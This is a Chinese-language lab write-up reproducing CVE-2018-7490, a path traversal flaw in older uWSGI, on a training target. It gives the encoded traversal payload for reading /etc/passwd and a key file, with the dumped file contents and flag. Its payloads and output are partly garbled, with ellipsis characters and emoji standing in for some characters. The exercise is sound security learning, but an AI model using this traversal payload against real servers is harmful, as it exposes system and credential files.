【墨者学院 】uWSGI 漏洞复现（CVE-2018-7490）

0x00前言

… 表示上一级目录
%2f是url编码的/

0x01 漏洞详情

uWSGI是一款Web应用程序服务器，它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17以前版本中存在路径遍历漏洞，该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可经过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。
uWSGI 2.0.17以前版本中存在路径遍历漏洞，该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可经过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 访问地址存在使用信息，存在uwsgi/php，可是没找到显示版本的地址，就盲试、

https://www.exploit-db.com/exploits/44223

经过phpinfo发现是使用uWSGI,就可能存在任意文件读取漏洞。

0x0 墨者学院靶子地址

地址

2.payload ：

An attacker could exploit this vulnerability by using path traversal sequences ("…%2f") to access sensitive information as demonstrated below: http://example.runesec.com:1337/…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc/passwd We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error: [uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path
由上可知，经过…%2f 编码进行…/ 的绕过。直接拿取payload进行测试：

/…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc/passwd

获取：root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/bin/false

判断是存在漏洞的版本。
直接改写payload ，按照提示根目录 key.txt“/…%2f…%2f…%2f…%2f…%2f…%2f…%2fkey.txt”
3.获取key

mozhe6502bdd14eadeb443e74b29a97b

0x03 参考

https://www.anquanke.com/vul/id/1124864